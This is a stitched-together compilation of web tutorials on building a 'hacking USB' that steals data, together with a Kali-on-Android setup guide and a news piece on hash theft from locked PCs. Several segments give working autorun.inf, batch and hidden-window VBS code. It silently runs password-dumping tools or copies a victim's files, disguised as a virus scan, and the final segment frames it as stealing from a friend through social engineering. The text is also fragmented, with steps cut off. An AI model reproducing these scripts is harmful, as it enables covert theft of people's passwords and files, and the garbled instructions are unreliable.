How To Create A Portable Hacking Device
How To Create A Portable Hacking Device
Yes. you heard it right. A portable hacking device that will be a pen drive from
outside, but a powerful hacking tool from inside. There’s nothing to hype about this, it
is just a few commands that will help you to access each and every password stored
on the users’ PC or Laptop.
Some will call it hacking and some will call it stealing. But to be more clear, the way
you use this device will define your deed. If you are helping someone with it then it
will not be considered as stealing, but if you are doing this to disrespect someone’s
privacy then my friend results can be terrible.
” @echo off
cls
start \usb\WebBrowserPassView.exe
/shtml 1.html “
after you have copied this command, save the file as USB Driver.bat.
6: Open the Notepad again and copy the following commands:
” [autorun]
open=usbdriver.bat
Action=Perform a Virus Scan “
after copying this, save the file as Autorun.inf.
Step 7: Copy both files, Autorun.inf and USBdriver.bat into your pen drive.
This will create you a portable hacking device. Insert it into the victim’s folder and
notice the magic. Just Kidding, allow access to Virus check, after you see this pop-up
just click Yes. After tapping, you will get a screen like this:
Just press Ctrl+A and then Ctrl+S to save the file into your pen drive. Now open the
note pas file that you saved. Kudos, you have now the list of all the password’s saved
on your victim’s computer.
OTE: Sometimes the Autorun file doesn’t work. In that case, open the pen drive
partition and then double click on the USB drive. After that, just tap Ctrl+Aand
then Ctrl+S. This will save the list of passwords.
This simple hack is very simple, to begin with, as you can see. The one with the basic
knowledge of computers can also make this device. Also, please don’t use this hack to
exploit people’s privacy. Instead, use this to help others in need.
13
Shares
Then click File > Save. This will autorun a program called "launch.exe"
that we're going to make right now. So right click in the folder again
and select "new>textdocument" and rename it "launch.bat". Then right
click on it and select "edit". Now type:
\usb.vbs
Save, and close it. This will tell it to open a file called "usb.vbs" that we
will create in a second. But first we need to convert the batch file to an
executable that Windows can autorun.
Now let's create the usb.vbs file. This will find the drive letter of the
USB drive so that we can automatically save stuff to it. So, create
another new text document and rename it to "usb.vbs". Then right
click on it and select edit. You want to type in this code:
Dim oFSO, oDrive,objFolder,oUsbDrive,oDestination, shell
Const USBDRIVE=1
oDestination = "c:\test"
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set shell=createobject("wscript.shell")
'Get USB drive letter
For Each oDrive In oFSO.Drives
2 More Images
You can find some good programs at "nirsoft.net" that are good for
retrieving passwords and information. Such as PasswordFox. Just
extract the files and copy them to your USB drive. Lastly, we need to
create a USB file that runs the program silently and stores the data it
collects back on the USB drive. So right click in the USB drive and
create a new text file and rename it "batch.bat". Then right click on it
and select "edit". To launch the program type:
start %~dp0PasswordFox.exe /shtml %~dp0firefox.html
Protection
The best way to protect yourself from this type of hack is to disable
any type of autorun feature. To enable/disable autorun in windows xp,
go to "start > run" type gpedit.msc and hit enter. Select "Administrative
Templates > System" and then double click on "Turn off autoplay" to
enable/disable it. In vista and 7 go to start and type "gpedit.msc",
select administrative templates > Windows Components" and double
click on "Autoplay policies" to enable or disable it.
PeterStavrou.com
Blog
Services
Marketing Tools
Shop
Testimonials
About
About Me
Contact
Usually I write about Internet Marketing and share with you different techniques you
can use to grow your business, but today I decided to switch it up a little and create
more of a “fun” post, like how to make a hacking USB similar to the one used in Mr.
Robot.
For those who don’t know, Mr. Robot is American TV series about a young, anti-
social computer hacker. In Season 2, Episode 6, one of the characters inserts a USB
into a computer allowing the hackers to take control of the entire system.
The hacking USB you are going to make will quickly grab every password saved on
the computer and save it to your USB.
Please note that I am not creating this tutorial so you can harm others, I am creating it
so you can see how easy it is for someone to steal your passwords if you save them.
The hacking USB is also extremely useful for IT technicians or for users who always
seem to forget their passwords.
Also, this will only work computers running Windows and the files on there will be
marked as malicious by virus scanners.
5. Create a Text Document inside the Tools folder by right-clicking on the white
space, clicking on New and selecting Text Document.
If you can’t see the .txt extension at the end of your new document then you will need
to disable the feature Hide file extensions on your computer by using this guide.
7. Right-click on your batch file and click on Edit.
I always recommend you use Note++ or Atom when doing any type of coding but for
this tutorial Notepad will do.
:: www.PeterStavrou.com
@echo off
:: Echo makes the command prompt window blank. You can try remove this to see what happens.
mkdir log
:: Creates a folder called log only if the folder does not already exist.
Now if you run the Script.bat file you will notice that a folder called log has
been created with a list of passwords.
Additional Steps (Optional)
If you’re like me and like to keep everything neat and tidy then the below
steps are recommended.
1. Right-click the Script.bat file and select Create shortcut.
2. Move the shortcut you created from the folder Tools to the Folder Hacking
USB.
3. Copy and paste the files onto a USB device.
Conclusion
As you can see it is very easy for someone to create a hacking USB to steal all
your passwords which it is why you should be very careful when saving
sensitive credentials such as bank details on your computer. Even though a
lot of malicious programs are smart enough to bypass virus scanners, it is
still recommended that you have one installed.
If you’re an IT technician, this USB is definitely very handy to have.
Also, if you are someone that forgets your passwords all the time then this is
a great way to find them.
HOW-TO GUIDES WINDOWS HACKS
There exists many tools for recovering these passswords from their stored
places. Using these tools and a USB pen-drive, you can create your own
rootkit to sniff passwords from any computer. We need the following tools
to create our rootkit:
Mail PassView can also recover the passwords of Web-based email accounts
(HotMail, Yahoo!, Gmail), if you use the associated programs of these
accounts.
IE Passview : IE PassView is a small utility that reveals the passwords stored
by Internet Explorer browser. It supports the new Internet Explorer 7.0, as
well as older versions of Internet explorer, v4.0 – v6.0
Record Index, Web Site, User Name, Password, User Name Field and
Password Field.
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.
When the installation is complete, open UserLAnd, and view the "Apps" tab. Refresh
the tab and wait a few minutes for the distributions to populate.
The Kali Linux OS has recently been added to the list of available distributions. Select
"Kali" or "Debian" and the UserLAnd app will prompt for credentials. Create a
username, password, and VNC password. The "Password" will allow access to the
SSH server started when the filesystem is finished installing. The "VNC Password"
won't be used in this tutorial but is required to proceed with the installation.
UserLAnd will then download the necessary executables and scripts from its
GitHub repository that are used to create the filesystems. The time it takes to
download and extract the required assets will vary based on the Android CPU
and internet connection speed. The installation process took up to 20 minutes
to complete in some tests, so be patient.
In my first attempt, UserLAnd returned the following "Could not extract
filesystem. Something went wrong " error. Removing and reinstalling the
UserLAnd application seemed to resolve the issue. If this error persists, open a
new GitHub issue.
Step 4Interact with the Filesystem
When the installation is complete, head over to the "Sessions" tab, and select
the newly created option. UserLAnd will automatically attempt to open
ConnectBot and ask "Are you sure you want to continue connecting?" Tap
"Yes," and enter the password created in the previous step.
At this point, syncing a Bluetooth keyboard to the phone will make setting up
the OS easier, but isn't required. If you don't use a Bluetooth keyboard, I
recommend installing Hacker's Keyboard from the Play Store, and you'll see
why as we continue.
update the OS
The first thing to do after installing a new operating system on your Android
phone is making sure the system is fully up to date. This can be done by first
using su to create a root shell. Next, use the apt-get update && apt-get dist-
upgrade command.
distortion@localhost:~$ su
root@localhost: /home/distortion# apt-get update && apt-get dist-upgrade
Ign:1 http://cdn-fastly.deb.debian.org/debian stable InRelease
Get:2 http://cdn-fastly.deb.debian.org/debian stable-updates InRelease [91.0 kB]
Hit:3 http://cdn-fastly.deb.debian.org/debian stable Release
Get:4 http://cdn-fastly.deb.debian.org/debian stable Release.gpg [2434 B]
Get:5 http://cdn-fastly.deb.debian.org/debian stable-updates/main arm64 Packages
[5096 B]
Get:6 http://cdn-fastly.deb.debian.org/debian stable-updates/main Translation-en
[4512 B]
Get:7 http://cdn-fastly.deb.debian.org/debian stable/main Translation-en [5393 B]
Get:8 http://cdn-fastly.deb.debian.org/debian stable/contrib arm64 Packages [29.9 kB]
Get:9 http://cdn-fastly.deb.debian.org/debian stable/contrib Translation-en [45.9 kB]
Get:10 http://cdn-fastly.deb.debian.org/debian stable/non-free arm64 Package [50.8
kB]
Get:11 http://cdn-fastly.deb.debian.org/debian stablenon-free Translation-en [80.6
kB]
Fetched 5714 kB in 31s (183 kB/s)
Reading package lists... Done
Reading package lists... Done
Building dependency tree... Done
Calculating upgrade... Done
The following packages will be upgraded:
tzdata
1 upgraded, 0 newly intalled, 0 to remove and 0 not upgraded.
Need to get 270 kB of archives.
After this operation, 1024 B of additional disk space will be used.
Do you want to continue? [Y/n]
In the case of the above output, there's only one package that needed updating,
but this might not always be true.
Don't Miss: Top 10 Things to Do After Installing Kali Linux
Step 6Install Essential Software
This new filesystem is extremely bareboned and doesn't include very much
software by default. Below are a few packages recommended for everyday
Debian and Kali users. Some packages aren't required but will make it easier to
follow along in future articles where Android is used as the primary hacking
device.
gnupg — GnuPG (sometimes referred to as gpg) is generally used for encrypting files and securing email
communications. Some installer scripts (like Metasploit) use gpg in order to import their software
signing keys. It's possible to manually install Metasploit without gpg, but it will make the process less
complicated.
curl — cURL is a command line tool capable of downloading files over HTTP and other popular protocols.
This is a useful tool to have for downloading files from the internet.
wget — Like cURL, wget is a command line tool used to download files from the internet. Some
developers prefer wget over cURL, so it's helpful to keep both installed and available.
git — Git is a popular version control software and is commonly used to clone (download) GitHub
projects. Git is often recommended by Null Byte users.
nano — Nano is a command line text editor. Nano will make editing files via SSH more convenient. If Vim
or Emacs is preferred, download those text-editors instead (or in addition to nano).
apt-get update && apt-get install net-tools netcat neofetch gnupg curl wget git nano
screen
Step 7Import the Kali Linux Repository (Conditional)
If you installed the Kali OS in Step 3, this step can be skipped. For Debian OS
users, importing the Kali repository into your distribution isn't mandatory.
However, doing so will allow for quick installations of applications such
as sqlmap, Commix, Bettercap, Nikto, dnsmap, and hundreds of packages that
can't be found in Debian's default repositories.
To start importing the Kali Linux repository, use nano to add Kali's repository to
the /etc/apt/sources.list file.
nano /etc/apt/sources.list
Add the below line to the bottom of the file (shown below), then use Ctrl + X to
exit and save the changes. ConnectBot has on-screen buttons for keys
like Ctrl and Shift. Alternatively, a Bluetooth keyboard or the Hacker's Keyboard
app will come in handy for exiting the nano terminal.
Reading Time: 3 minutes
This should come as a surprise, a mild or perhaps not-so-mild shock, to those many
people who lock their computer screens while temporarily moving away. Well, your
system, your data is not secure when you do so. It’s just a USB device that’s needed to
steal critical data from your locked system. This might be news for many, as regards PC
security.
Security expert Rob Fuller has now explained that it’s very easy to copy an OS account
password hash from a locked computer using a special USB device, and that too in a
few seconds. This hash can then be cracked or used directly in network attacks. Rob,
who has over a decade’s experience covering all aspects of information security, has
explained this in detail in a post that he has made on his website www.room362.com.
Rob Fuller has proved this using a flash-drive-size computer device called USB Armory
that costs $155, but he has also stated that it can be done using other cheaper devices
as well. Says Rob Fuller- “I started off with a USB Armory ($155) but below I’ll show you
how to do this with a Hak5 Turtle ($49.99) as well.”
How it works
All that it takes is to plug in a device that masquerades as a USB Ethernet adapter in
such a way that it becomes the primary network interface on the locked computer that’s
targeted. This is rather easy because firstly, even if a computer is locked, OSs
automatically start installing newly connected USB devices, including Ethernet cards,
and secondly, the OSs automatically configure such devices as the default gateways.
Says Rob Fuller in his website post- “USB is Plug-and-Play. This means that even if a
system is locked out, the device still gets installed. Now, I believe there are restrictions
on what types of devices are allowed to install at a locked out state on newer operating
systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list.”
When a new network card gets installed, the Operating System would configure it to
automatically detect the network settings. This is done through the DHCP (Dynamic
Host Configuration Protocol) and anyone wishing to steal data from a locked computer
can have a rogue computer at the other end of the Ethernet cable to act as a DHCP
server. When it’s a USB Armory that’s used, it becomes easier because USB Armory
works like a computer on a stick, powered via USB and running on Linux. Thus, there is
no need to attach a separate rogue machine.
Thus, the attacker happens to gain control of a computer’s network settings using the
USB device. He thus also can control the system’s DNS (Domain Name System)
responses and is able to configure a rogue internet proxy through the WPAD (Web
Proxy Autodiscovery) protocol and more. Thereby he attains an advantageous man-in-
the-middle position, which he can utilize to intercept and tamper with the computer’s
network traffic.
As Rob Fuller says- “Computers are constantly creating traffic, even if you don’t have
any browsers or applications open, and most computers trust their local network…”
Thus, it becomes possible for the attacker who makes his entry into the system using
the USB device to extract the account name and the hashed password. The capturing
of credentials from a locked system in this manner can be done in a short time. Rob
Fuller says he needed only about 13 seconds for his test attack.
The stolen password hashes would either be in the in NT LAN Manager (NTLM) version
2 or NTLMv1 format, based on the targeted computer and its configuration. NTLMv2
hashes, though harder to crack, can be cracked if the password is not too complex and
the hacker uses a powerful password cracking rig. Moreover, there are some instances
where relay attacks against network services can be made possible by using NTLM
hashes directly without having to know plaintext passwords.
So, next time you move away leaving your computer locked, remember that someone
can very easily get away with your credentials and shatter your concepts regarding PC
security.
Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a
moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.
To get the notes you can either break into his house at night, an accomplice keeps you hanging
by a rope from the roof while you deliberately copy the files to your flash drive taking care not
to let your feet touch the floor. Or you can walk into his room one morning and say with a
feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash
drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy
the songs you brought to his PC to complete the act.
Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.
STEP 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon.
It’s useful for social engineering purposes like enticing the user to click a file on the drive by
making it looks like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask
the user what to open. Depending on what you put here the user will be instructed to click Ok
or run the file. This code acts as a backup just in case the user is asked what to open. This is not
required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open
when prompted. This code will execute when the drive letter is clicked on.
STEP 2
Open Notepad again and copy-paste the following lines
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
Save this as file.bat
This file is configured to copy the contents of the current users pictures, favorites, and videos
folder to the Flash drive under a folder called “all”. This is the section of the code you will need
to edit depending on what you want to copy.
The first file path "%USERPROFILE%\pictures" – is the target.
The second file path "%drive%\all\My pics" – is the destination.
STEP 3
Open Notepad once again and copy-paste the following line.
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the
batch file is processing.
STEP 4
Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat
Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive
then loads it with file.bat so file.bat is run with code from vbs file.
STEP 5
Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the
icon file if needed. Also create a folder named “all” where the contents are to be copied
automatically. You can call this folder by any name, but then you need to reflect the changes
you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing
it out on your victim. It works flawlessly.